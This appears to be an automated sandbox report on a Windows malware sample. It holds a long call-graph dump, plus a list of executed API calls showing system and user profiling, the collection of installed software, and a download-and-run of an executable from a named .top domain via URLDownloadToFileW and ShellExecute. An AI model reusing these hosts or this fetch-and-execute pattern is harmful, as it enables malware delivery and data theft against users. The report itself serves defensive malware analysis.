26705 419e76 42 API calls 4 library calls 26689->26705 26708 419e76 42 API calls 4 library calls 26690->26708 26694 419e11 26695 419e19 26694->26695 26696 419e60 26694->26696 26695->26701 26706 4229da 14 API calls _free 26695->26706 26709 4229da 14 API calls _free 26696->26709 26698 419e65 26698->26701 26710 4229da 14 API calls _free 26698->26710 26701->26678 26702->26682 26703->26686 26704->26687 26705->26694 26706->26688 26707->26701 26708->26694 26709->26698 26710->26701 26712 4105dc 26711->26712 26740 410679 26711->26740 26779 422a23 26712->26779 26714 4105e7 26715 410604 26714->26715 26716 422a23 37 API calls 26714->26716 26717 410641 26715->26717 26718 410630 26715->26718 26719 410685 26715->26719 26720 410709 26715->26720 26721 41061f 26715->26721 26732 4107ea 26715->26732 26715->26740 26716->26714 26847 4103d0 26717->26847 26817 410ad0 26718->26817 26731 41069b 26719->26731 26741 4106c9 26719->26741 26860 4229da 14 API calls _free 26720->26860 26784 4108b0 26721->26784 26726 41070e 26861 42294a 40 API calls 26726->26861 26727 410629 26727->26636 26728 41063a 26728->26636 26729 410648 26736 41d3ea ___std_exception_copy 15 API calls 26729->26736 26729->26740 26735 41d3ea ___std_exception_copy 15 API calls 26731->26735 26733 41d3ea ___std_exception_copy 15 API calls 26732->26733 26732->26740 26733->26740 26734 410720 26862 4229da 14 API calls _free 26734->26862 26735->26740 26738 410655 26736->26738 26739 41065c 26738->26739 26743 41d1c2 ___vcrt_freefls@4 14 API calls 26738->26743 26739->26636 26740->26636 26741->26740 26742 41d3ea ___std_exception_copy 15 API calls 26741->26742 26742->26740 26743->26740 26744 41072c ___from_strstr_to_strchr 26744->26740 26745 41d3ea ___std_exception_copy 15 API calls 26744->26745 26745->26740 26747 424bd8 _free 14 API calls 26746->26747 26748 41d1da 26747->26748 26748->26634 26750 410cb9 26749->26750 26751 410d65 26750->26751 26752 410cca 26750->26752 26753 41d1c2 ___vcrt_freefls@4 14 API calls 26751->26753 26754 410ccf 26752->26754 26768 410d11 26752->26768 26756 410d6d 26753->26756 26754->26756 26757 410cd8 26754->26757 26755 410d3f 26760 41d1c2 ___vcrt_freefls@4 14 API calls 26755->26760 26758 41d1c2 ___vcrt_freefls@4 14 API calls 26756->26758 26759 410cf3 26757->26759 26765 410cb0 14 API calls 26757->26765 26764 410d76 26758->26764 26762 41d1c2 ___vcrt_freefls@4 14 API calls 26759->26762 26761 410d47 26760->26761 26766 41d1c2 ___vcrt_freefls@4 14 API calls 26761->26766 26767 410cfb 26762->26767 26763 41d1c2 ___vcrt_freefls@4 14 API calls 26763->26768 26764->26633 26765->26757 26769 410d4f 26766->26769 26770 41d1c2 ___vcrt_freefls@4 14 API calls 26767->26770 26768->26755 26768->26763 26771 410cb0 14 API calls 26768->26771 26772 41d1c2 ___vcrt_freefls@4 14 API calls 26769->26772 26773 410d01 26770->26773 26771->26768 26774 410d55 26772->26774 26775 41d1c2 ___vcrt_freefls@4 14 API calls 26773->26775 26776 41d1c2 ___vcrt_freefls@4 14 API calls 26774->26776 26777 410d0a 26775->26777 26778 410d5e 26776->26778 26777->26633 26778->26633 26780 422a31 26779->26780 26782 422a3f __fassign 26779->26782 26863 4229ed 37 API calls 2 library calls 26780->26863 26782->26714 26783 422a3b 26783->26714 26864 410d80 26784->26864 26786 4108c9 26786->26727 26787 410a7c 26789 410cb0 14 API calls 26787->26789 26806 410ab5 26787->26806 26788 4108c3 26788->26786 26788->26787 26791 422a23 37 API calls 26788->26791 26790 410a83 26789->26790 26790->26727 26792 410903 26791->26792 26794 422a23 37 API calls 26792->26794 26816 410924 26792->26816 26793 41092c 26793->26727 26794->26792 26795 410a35 26796 422a23 37 API calls 26795->26796 26798 410a3e 26796->26798 26797 4103d0 15 API calls 26797->26816 26799 422a23 37 API calls 26798->26799 26800 410a59 26798->26800 26799->26798 26800->26787 26872 4100e0 26800->26872 26801 410a8d 26803 41d1c2 ___vcrt_freefls@4 14 API calls 26801->26803 26805 410a93 26803->26805 26804 4105c0 41 API calls 26804->26816 26807 410cb0 14 API calls 26805->26807 26806->26727 26808 410a9d 26807->26808 26808->26727 26810 410a6d 26811 41d1c2 ___vcrt_freefls@4 14 API calls 26810->26811 26813 410a72 26811->26813 26812 41d1c2 ___vcrt_freefls@4 14 API calls 26812->26816 26814 410cb0 14 API calls 26813->26814 26814->26787 26815 422a23 37 API calls 26815->26816 26816->26787 26816->26793 26816->26795 26816->26797 26816->26801 26816->26804 26816->26810 26816->26812 26816->26815 26887 410020 15 API calls 2 library calls 26816->26887 26888 410df0 26817->26888 26819 410aed 26819->26728 26820 410c8a 26821 410cb0 14 API calls 26820->26821 26823 410c95 26821->26823 26822 410ae3 26822->26819 26822->26820 26824 422a23 37 API calls 26822->26824 26823->26728 26825 410b1d 26824->26825 26826 422a23 37 API calls 26825->26826 26845 410b38 26825->26845 26826->26825 26827 410b40 26827->26728 26828 410be5 26830 422a23 37 API calls 26828->26830 26829 4105c0 41 API calls 26829->26845 26831 410bee 26830->26831 26833 422a23 37 API calls 26831->26833 26834 410c09 26831->26834 26833->26831 26834->26820 26836 41d3ea ___std_exception_copy 15 API calls 26834->26836 26835 410c72 26837 410cb0 14 API calls 26835->26837 26839 410c28 26836->26839 26838 410c79 26837->26838 26840 410cb0 14 API calls 26838->26840 26839->26820 26841 410c31 __fread_nolock 26839->26841 26842 410c80 26840->26842 26843 41d1c2 ___vcrt_freefls@4 14 API calls 26841->26843 26842->26728 26844 410c57 26843->26844 26844->26728 26845->26820 26845->26827 26845->26828 26845->26829 26845->26835 26846 422a23 37 API calls 26845->26846 26896 410210 15 API calls 3 library calls 26845->26896 26846->26845 26848 41052d 26847->26848 26850 4103e2 26847->26850 26848->26729 26849 41d3ea ___std_exception_copy 15 API calls 26857 410430 26849->26857 26850->26848 26850->26849 26851 410518 26852 41d1c2 ___vcrt_freefls@4 14 API calls 26851->26852 26853 41051e 26852->26853 26853->26729 26854 41d3ea ___std_exception_copy 15 API calls 26855 4104f4 26854->26855 26855->26851 26856 4104fd __fread_nolock 26855->26856 26858 41d1c2 ___vcrt_freefls@4 14 API calls 26856->26858 26857->26851 26857->26854 26859 41050b 26858->26859 26859->26729 26860->26726 26861->26734 26862->26744 26863->26783 26865 41d3ea ___std_exception_copy 15 API calls 26864->26865 26866 410d88 26865->26866 26867 41d3ea ___std_exception_copy 15 API calls 26866->26867 26871 410dd7 26866->26871 26868 410da5 26867->26868 26869 410dde 26868->26869 26870 41d1c2 ___vcrt_freefls@4 14 API calls 26868->26870 26869->26788 26870->26871 26871->26788 26873 4100f2 26872->26873 26874 4100f6 26873->26874 26875 41d3ea ___std_exception_copy 15 API calls 26873->26875 26874->26787 26876 410114 26875->26876 26876->26874 26877 41d3ea ___std_exception_copy 15 API calls 26876->26877 26878 410123 26877->26878 26879 41012e 26878->26879 26886 410140 __fread_nolock 26878->26886 26880 41d1c2 ___vcrt_freefls@4 14 API calls 26879->26880 26881 410134 26880->26881 26881->26787 26882 41d1c2 ___vcrt_freefls@4 14 API calls 26883 41017f 26882->26883 26884 41d1c2 ___vcrt_freefls@4 14 API calls 26883->26884 26885 410187 26884->26885 26885->26787 26886->26882 26887->26816 26889 41d3ea ___std_exception_copy 15 API calls 26888->26889 26890 410df8 26889->26890 26891 410e40 26890->26891 26892 41d3ea ___std_exception_copy 15 API calls 26890->26892 26891->26822 26893 410e15 26892->26893 26894 410e47 26893->26894 26895 41d1c2 ___vcrt_freefls@4 14 API calls 26893->26895 26894->26822 26895->26891 26896->26845 26898 41d101 ___scrt_is_nonwritable_in_current_image 26897->26898 26899 41d108 26898->26899 26902 41d12a 26898->26902 26922 4229da 14 API calls _free 26899->26922 26901 41d10d 26904 41d13c 26902->26904 26905 41d12f 26902->26905 26914 424f3a 26904->26914 26924 4229da 14 API calls _free 26905->26924 26922->26901 27598 42350f 27599 423518 27598->27599 27602 42352e 27598->27602 27599->27602 27604 42358e 27599->27604 27601 423525 27601->27602 27615 42386b 15 API calls 3 library calls 27601->27615 27605 423597 27604->27605 27606 42359a 27604->27606 27605->27601 27616 42b8bd GetEnvironmentStringsW 27606->27616 27610 4235b2 27613 424bd8 _free 14 API calls 27610->27613 27611 424bd8 _free 14 API calls 27612 4235d6 27611->27612 27612->27601 27614 4235a7 27613->27614 27614->27611 27615->27602 27617 42b8d1 27616->27617 27618 4235a1 27616->27618 27619 425373 __fread_nolock 15 API calls 27617->27619 27618->27614 27623 4236ac 25 API calls 3 library calls 27618->27623 27622 42b8e5 __fread_nolock 27619->27622 27620 424bd8 _free 14 API calls 27621 42b8ff FreeEnvironmentStringsW 27620->27621 27621->27618 27622->27620 27623->27610 27624 403770 27625 403785 27624->27625 27626 40f0f0 27 API calls 27625->27626 27627 4037b1 27626->27627 27628 40f020 27 API calls 27627->27628 27629 4037c3 27628->27629 27630 402680 43 API calls 27629->27630 27635 4037cf 27630->27635 27632 406879 27633 406885 27632->27633 27634 401f20 25 API calls 27632->27634 27636 414d60 4 API calls 27633->27636 27634->27633 27644 40eee0 27 API calls 27635->27644 27637 4068bb 27636->27637 27645 40eee0 27 API calls 27637->27645 27639 4068c3 27640 401f20 25 API calls 27639->27640 27641 4068cb 27640->27641 27642 401f20 25 API calls 27641->27642 27643 4068d3 27642->27643 27644->27632 27645->27639 27646 4277f2 27647 424dc7 __fread_nolock 14 API calls 27646->27647 27648 427800 27647->27648 27649 42782e 27648->27649 27650 42780f 27648->27650 27652 427849 27649->27652 27653 42783c 27649->27653 27674 4229da 14 API calls _free 27650->27674 27658 42785c 27652->27658 27676 427bba 16 API calls __wsopen_s 27652->27676 27675 4229da 14 API calls _free 27653->27675 27656 4278db 27663 427a20 27656->27663 27658->27656 27659 427814 27658->27659 27660 42ee3b __fread_nolock 14 API calls 27658->27660 27661 4278ce 27658->27661 27660->27661 27661->27656 27677 42eec3 15 API calls 2 library calls 27661->27677 27664 424dc7 __fread_nolock 14 API calls 27663->27664 27665 427a2f 27664->27665 27666 427ad2 27665->27666 27667 427a42 27665->27667 27668 42751e __wsopen_s 59 API calls 27666->27668 27669 427a5f 27667->27669 27671 427a83 27667->27671 27672 427a6c 27668->27672 27670 42751e __wsopen_s 59 API calls 27669->27670 27670->27672 27671->27672 27673 4286e2 18 API calls 27671->27673 27672->27659 27673->27672 27674->27659 27675->27659 27676->27658 27677->27656 27678 4025f0 GdipDisposeImage 27679 40260a 27678->27679 27681 40261b 27678->27681 27680 40260e GdipFree 27679->27680 27679->27681 27682 40aa92 RegQueryValueExW 27683 40aaab RegCloseKey 27682->27683 27684 417b20 ___scrt_fastfail 27683->27684 27685 40aad0 RegOpenKeyExW 27684->27685 27686 40ab0b RegCloseKey GetUserNameW 27685->27686 27687 40ab4b 27686->27687 27688 41da01 34 API calls 27687->27688 27689 40ab50 27688->27689 27690 402a20 40 API calls 27689->27690 27691 40ab63 27690->27691 27692 402120 27 API calls 27691->27692 27693 40ab90 27692->27693 27694 40f2f0 27 API calls 27693->27694 27695 40aba5 ExpandEnvironmentStringsW 27694->27695 27697 40abfd CreateDirectoryW 27695->27697 27698 40ac2f 27697->27698 27699 41da01 34 API calls 27698->27699 27700 40ac34 Sleep 27699->27700 27701 40ac7a 27700->27701 27702 40acec 27701->27702 27703 41d399 25 API calls 27701->27703 27704 40ad12 27703->27704 27705 41f5d3 27708 41f5f0 27705->27708 27710 41f5fc ___scrt_is_nonwritable_in_current_image 27708->27710 27709 41f5eb 27710->27709 27711 41f646 27710->27711 27712 41f60f ___scrt_fastfail 27710->27712 27721 424f12 EnterCriticalSection 27711->27721 27735 4229da 14 API calls _free 27712->27735 27715 41f650 27722 41f3ed 27715->27722 27717 41f629 27736 41d389 14 API calls __strnicoll 27717->27736 27721->27715 27723 41f3fe ___scrt_fastfail 27722->27723 27734 41f41a 27722->27734 27724 41f40a 27723->27724 27731 41f45c __fread_nolock 27723->27731 27723->27734 27738 4229da 14 API calls _free 27724->27738 27726 41f40f 27739 41d389 14 API calls __strnicoll 27726->27739 27728 41f583 ___scrt_fastfail 27741 4229da 14 API calls _free 27728->27741 27729 424dc7 __fread_nolock 14 API calls 27729->27731 27731->27728 27731->27729 27733 428d30 __fread_nolock 26 API calls 27731->27733 27731->27734 27740 41f68d 14 API calls 4 library calls 27731->27740 27733->27731 27737 41f685 LeaveCriticalSection __fread_nolock 27734->27737 27735->27717 27736->27709 27737->27709 27738->27726 27739->27734 27740->27731 27741->27726 27742 449c30 27743 449c3d 27742->27743 27748 4493d0 LocalAlloc 27743->27748 27745 449edb 27746 44a046 27745->27746 27749 4493f0 27745->27749 27748->27745 27750 44942b VirtualProtect 27749->27750 27750->27745 27752 41d3f5 27753 41d401 ___scrt_is_nonwritable_in_current_image 27752->27753 27754 41d407 27753->27754 27755 41d41c 27753->27755 27771 4229da 14 API calls _free 27754->27771 27765 424f12 EnterCriticalSection 27755->27765 27758 41d40c 27772 41d389 14 API calls __strnicoll 27758->27772 27759 41d428 27766 41d466 27759->27766 27762 41d417 27765->27759 27774 41d491 27766->27774 27768 41d473 27769 41d435 27768->27769 27795 4229da 14 API calls _free 27768->27795 27773 41d45c LeaveCriticalSection __fread_nolock 27769->27773 27771->27758 27772->27762 27773->27762 27775 41d4b6 27774->27775 27776 41d49f 27774->27776 27778 424dc7 __fread_nolock 14 API calls 27775->27778 27796 4229da 14 API calls _free 27776->27796 27780 41d4c0 27778->27780 27779 41d4a4 27797 41d389 14 API calls __strnicoll 27779->27797 27783 4286e2 18 API calls 27780->27783 27782 41d4af 27782->27768 27784 41d4db 27783->27784 27785 41d5a3 27784->27785 27786 41d54e 27784->27786 27794 41d505 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27784->27794 27787 41d5b1 27785->27787 27790 41d57c 27785->27790 27789 41d568 27786->27789 27786->27790 27799 4229da 14 API calls _free 27787->27799 27798 41d7d4 24 API calls 4 library calls 27789->27798 27790->27794 27800 41d615 18 API calls 2 library calls 27790->27800 27792 41d574 27792->27794 27794->27768 27795->27769 27796->27779 27797->27782 27798->27792 27799->27794 27800->27794 27801 4038dc 27802 4038e7 27801->27802 28017 40f450 27802->28017 27804 403911 27805 40f240 27 API calls 27804->27805 27806 40392b 27805->27806 27807 40f5a0 27 API calls 27806->27807 27808 403944 27807->27808 27809 40f240 27 API calls 27808->27809 27810 40395e 27809->27810 27811 41d399 25 API calls 27810->27811 27814 4068eb __wsopen_s 27811->27814 27812 406969 27813 40f450 27 API calls 27812->27813 27815 406979 27813->27815 27814->27812 27816 40f0f0 27 API calls 27814->27816 27817 40f240 27 API calls 27815->27817 27816->27812 27818 40698b 27817->27818 27819 40f5a0 27 API calls 27818->27819 27820 40699e ExpandEnvironmentStringsW 27819->27820 27827 4069c6 27820->27827 27822 41d399 25 API calls 27824 40a655 27822->27824 27823 40f450 27 API calls 27825 406aac 27823->27825 27826 40f240 27 API calls 27825->27826 27828 406abe 27826->27828 27827->27823 28016 408600 27827->28016 27829 40f5a0 27 API calls 27828->27829 27830 406ad1 ExpandEnvironmentStringsW 27829->27830 27834 406af3 27830->27834 27832 40f450 27 API calls 27833 406bd9 27832->27833 27835 40f240 27 API calls 27833->27835 27834->27832 27836 406beb 27835->27836 27837 40f5a0 27 API calls 27836->27837 27838 406bfe ExpandEnvironmentStringsW 27837->27838 27842 406c20 27838->27842 27840 40f450 27 API calls 27841 406d06 27840->27841 27843 40f240 27 API calls 27841->27843 27842->27840 27844 406d18 27843->27844 27845 40f5a0 27 API calls 27844->27845 27846 406d2b ExpandEnvironmentStringsW 27845->27846 27848 406d4d 27846->27848 27849 40f450 27 API calls 27848->27849 27850 406e33 27849->27850 27851 40f240 27 API calls 27850->27851 27852 406e45 27851->27852 27853 40f5a0 27 API calls 27852->27853 27854 406e58 ExpandEnvironmentStringsW 27853->27854 27856 406e7a 27854->27856 27857 40f450 27 API calls 27856->27857 27858 406f60 27857->27858 27859 40f240 27 API calls 27858->27859 27860 406f72 27859->27860 27861 40f5a0 27 API calls 27860->27861 27862 406f85 ExpandEnvironmentStringsW 27861->27862 27867 406fa7 27862->27867 27864 40f450 27 API calls 27865 40708d 27864->27865 27866 40f240 27 API calls 27865->27866 27868 40709f 27866->27868 27867->27864 27869 40f5a0 27 API calls 27868->27869 27870 4070b2 ExpandEnvironmentStringsW 27869->27870 27874 4070d4 27870->27874 27872 40f450 27 API calls 27873 4071ba 27872->27873 27875 40f240 27 API calls 27873->27875 27874->27872 27876 4071cc 27875->27876 27877 40f5a0 27 API calls 27876->27877 27878 4071df ExpandEnvironmentStringsW 27877->27878 27882 407201 27878->27882 27880 40f450 27 API calls 27881 4072e7 27880->27881 27883 40f240 27 API calls 27881->27883 27882->27880 27884 4072f9 27883->27884 27885 40f5a0 27 API calls 27884->27885 27886 40730c ExpandEnvironmentStringsW 27885->27886 27889 40732e 27886->27889 27888 40f450 27 API calls 27890 407414 27888->27890 27889->27888 27891 40f240 27 API calls 27890->27891 27892 407426 27891->27892 27893 40f5a0 27 API calls 27892->27893 27894 407439 ExpandEnvironmentStringsW 27893->27894 27896 40745b 27894->27896 27897 40f450 27 API calls 27896->27897 27898 407541 27897->27898 27899 40f240 27 API calls 27898->27899 27900 407553 27899->27900 27901 40f5a0 27 API calls 27900->27901 27902 407566 ExpandEnvironmentStringsW 27901->27902 27906 407588 27902->27906 27904 40f450 27 API calls 27905 40766e 27904->27905 27907 40f240 27 API calls 27905->27907 27906->27904 27908 407680 27907->27908 27909 40f5a0 27 API calls 27908->27909 27910 407693 ExpandEnvironmentStringsW 27909->27910 27914 4076b5 27910->27914 27912 40f450 27 API calls 27913 40779b 27912->27913 27915 40f240 27 API calls 27913->27915 27914->27912 27916 4077ad 27915->27916 27917 40f5a0 27 API calls 27916->27917 27918 4077c0 ExpandEnvironmentStringsW 27917->27918 27922 4077e2 27918->27922 27920 40f450 27 API calls 27921 4078c8 27920->27921 27923 40f240 27 API calls 27921->27923 27922->27920 27924 4078da 27923->27924 27925 40f5a0 27 API calls 27924->27925 27926 4078ed ExpandEnvironmentStringsW 27925->27926 27930 40790f 27926->27930 27928 40f450 27 API calls 27929 4079f5 27928->27929 27931 40f240 27 API calls 27929->27931 27930->27928 27932 407a07 27931->27932 27933 40f5a0 27 API calls 27932->27933 27934 407a1a ExpandEnvironmentStringsW 27933->27934 27936 407a3c 27934->27936 27937 40f450 27 API calls 27936->27937 27938 407b22 27937->27938 27939 40f240 27 API calls 27938->27939 27940 407b34 27939->27940 27941 40f5a0 27 API calls 27940->27941 27942 407b47 ExpandEnvironmentStringsW 27941->27942 27946 407b69 27942->27946 27944 40f450 27 API calls 27945 407c4f 27944->27945 27947 40f240 27 API calls 27945->27947 27946->27944 27948 407c61 27947->27948 27949 40f5a0 27 API calls 27948->27949 27950 407c74 ExpandEnvironmentStringsW 27949->27950 27955 407c96 27950->27955 27952 40f450 27 API calls 27953 407d7c 27952->27953 27954 40f240 27 API calls 27953->27954 27956 407d8e 27954->27956 27955->27952 27957 40f5a0 27 API calls 27956->27957 27958 407da1 ExpandEnvironmentStringsW 27957->27958 27962 407dc3 27958->27962 27960 40f450 27 API calls 27961 407ea9 27960->27961 27963 40f240 27 API calls 27961->27963 27962->27960 27964 407ebb 27963->27964 27965 40f5a0 27 API calls 27964->27965 27966 407ece ExpandEnvironmentStringsW 27965->27966 27970 407ef0 27966->27970 27968 40f450 27 API calls 27969 407fd6 27968->27969 27971 40f240 27 API calls 27969->27971 27970->27968 27972 407fe8 27971->27972 27973 40f5a0 27 API calls 27972->27973 27974 407ffb ExpandEnvironmentStringsW 27973->27974 27976 40801d 27974->27976 27977 40f450 27 API calls 27976->27977 27978 408103 27977->27978 27979 40f240 27 API calls 27978->27979 27980 408115 27979->27980 27981 40f5a0 27 API calls 27980->27981 27982 408128 ExpandEnvironmentStringsW 27981->27982 27984 40814a 27982->27984 27985 40f450 27 API calls 27984->27985 27986 408230 27985->27986 27987 40f240 27 API calls 27986->27987 27988 408242 27987->27988 27989 40f5a0 27 API calls 27988->27989 27990 408255 ExpandEnvironmentStringsW 27989->27990 27992 408277 27990->27992 27993 40f450 27 API calls 27992->27993 27994 40835d 27993->27994 27995 40f240 27 API calls 27994->27995 27996 40836f 27995->27996 27997 40f5a0 27 API calls 27996->27997 27998 408382 ExpandEnvironmentStringsW 27997->27998 28002 4083a4 27998->28002 28000 40f450 27 API calls 28001 40848a 28000->28001 28003 40f240 27 API calls 28001->28003 28002->28000 28004 40849c 28003->28004 28005 40f5a0 27 API calls 28004->28005 28006 4084af ExpandEnvironmentStringsW 28005->28006 28010 4084d1 28006->28010 28008 40f2f0 27 API calls 28009 4085b9 28008->28009 28011 40f5a0 27 API calls 28009->28011 28010->28008 28012 4085cc 28011->28012 28013 40f240 27 API calls 28012->28013 28014 4085de ExpandEnvironmentStringsW 28013->28014 28014->28016 28016->27822 28018 40f4a0 28017->28018 28018->28018 28019 4021e0 27 API calls 28018->28019 28020 40f4bf 28019->28020 28022 40f4d5 __InternalCxxFrameHandler 28020->28022 28026 40fa50 27 API calls __fread_nolock 28020->28026 28022->28022 28025 40f53b __InternalCxxFrameHandler 28022->28025 28027 40fa50 27 API calls __fread_nolock 28022->28027 28024 40f588 28024->27804 28025->27804 28026->28022 28027->28024 28028 19d7a00 28030 19d7a0d 28028->28030 28031 19d7a0e 28028->28031 28032 19d7a1d 28031->28032 28035 19d81ae 28032->28035 28036 19d81c9 Module32First 28035->28036 28038 19d81fd 28036->28038 28039 19d7a26 28036->28039 28041 19d7e6d 28038->28041 28039->28030 28042 19d7e98 28041->28042 28043 19d7ea9 VirtualAlloc 28042->28043 28044 19d7ee1 28042->28044 28043->28044 28044->28044

                                            Executed Functions

                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DCA5
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DD85
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040DE4D
                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0040DEA4
                                            • RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0040DECB
                                            • RegQueryValueExW.KERNEL32(?,CurrentBuildNumber,00000000,00000000,?,?), ref: 0040DEE4
                                            • RegQueryValueExW.KERNEL32(?,ReleaseId,00000000,00000000,?,?), ref: 0040DEFD
                                            • RegCloseKey.KERNEL32(?), ref: 0040DF02
                                            • ExpandEnvironmentStringsW.KERNEL32(%WINDIR%\SysWOW64,?,00000208), ref: 0040DF19
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040DF2C
                                            • GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0040DFCE
                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E048
                                            • LocalAlloc.KERNEL32(00000040), ref: 0040E056
                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E061
                                            • GetLocaleInfoW.KERNEL32(?,00000002,?,00000200), ref: 0040E086
                                            • LocalFree.KERNEL32(?), ref: 0040E0EC
                                            • _strftime.LIBCMT ref: 0040E15E
                                            • _strftime.LIBCMT ref: 0040E17B
                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040E1E6
                                            • GetComputerNameW.KERNEL32(?,00000206), ref: 0040E1F7
                                            • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0040E265
                                            • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040E288
                                            • RegCloseKey.ADVAPI32(?), ref: 0040E28D
                                            • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000,00000000,00020119,?), ref: 0040E2A8
                                            • RegQueryValueExW.KERNEL32(?,DriverDesc,00000000,00000000,?,?), ref: 0040E2C5
                                            • RegCloseKey.ADVAPI32(?), ref: 0040E2CA
                                            • GetSystemInfo.KERNEL32(?), ref: 0040E2D7
                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0040E2EE
                                            • GetSystemMetrics.USER32 ref: 0040E2FC
                                            • GetSystemMetrics.USER32 ref: 0040E302
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0040E3F7
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E56C
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E63A
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E739
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E8E2
                                            • Sleep.KERNEL32(?), ref: 0040EB01
                                            • Sleep.KERNEL32(?), ref: 0040EB47
                                            • Sleep.KERNEL32(?), ref: 0040EC21
                                            • Sleep.KERNEL32(?), ref: 0040EC64
                                            • ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
                                            • DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
                                            • Sleep.KERNEL32(?), ref: 0040EE18
                                            • URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
                                            • Sleep.KERNEL32(?), ref: 0040EE68
                                            • CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
                                            • CloseHandle.KERNEL32(00000000), ref: 0040EE95
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentExpandStrings$FileSleep$QueryValue$CloseName$OpenSystem$InfoKeyboardLayoutListLocalLocaleMetricsUser_strftime$AllocAttributesComputerCopyCreateDefaultDeleteDownloadExecuteFreeGlobalHandleMemoryModuleShellStatus
                                            • String ID: Local Date and Time: %Y-%m-%d %X$[Installed software]$ %wS$ Build: %wS$ Release: %wS$ (%wS)$%Temp%\$%Temp%\File.exe$%WINDIR%\SysWOW64$%wS$%wS | $.zip$32-bit_(x86)$64-bit_(x64)$CPU: %wS (Cores: %d)$CurrentBuildNumber$Display Resolution: %d x %d$DriverDesc$GPU: %wS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Keyboard Languages: $OS Language: %wS$OS: %wS$ProcessorNameString$ProductName$RQwv$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall$SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000$Start Build: %wS$Total RAM: %I64d MB$UTC: %z$UserName (ComputerName): %wS$\_Files$\_Files\_Information.txt$\files_$\files_\system_info.txt$a+,ccs=UTF-16LE$cemnit12.top$http://bojwfi01.top/download.php?file=lv.exe$h6D$h6D$h6D$h6D$moresh01.top$open$w/RQu$wtRQ*v$j
                                            • API String ID: 1785538002-1359323745
                                            • Opcode ID: 7cf1087107eb2c3ee2529d2794ba487ce2ca076c8f99e8df099a037e3fc621ed
                                            • Instruction ID: 254822e3e3d014b0c1d130a61bff6de9747d856b8ec4653272d1a1294d4e2b4b
                                            • Opcode Fuzzy Hash: 7cf1087107eb2c3ee2529d2794ba487ce2ca076c8f99e8df099a037e3fc621ed
                                            • Instruction Fuzzy Hash: 47B236B1E00208ABEB14DB64DD46BDE7779AF44304F10457AF404B72D2EB7DAA84CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1089 415bf0-415c09 call 433060 call 40aa30 1094 4161f0-4161f7 call 402c10 ExitProcess 1089->1094 1095 415c0f-415c16 call 40a680 1089->1095 1095->1094 1100 415c1c-415c39 ExpandEnvironmentStringsW 1095->1100 1101 415c53-4161e6 CreateDirectoryW call 40f2f0 call 401f10 ExpandEnvironmentStringsW call 401f20 CreateDirectoryW call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 CreateDirectoryW * 7 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 call 40f2f0 call 40f5a0 call 401f10 ExpandEnvironmentStringsW call 401f20 * 2 CreateDirectoryW * 7 call 414ec0 call 401eb0 call 40ad20 call 40db70 call 40b220 call 40d9b0 call 40e420 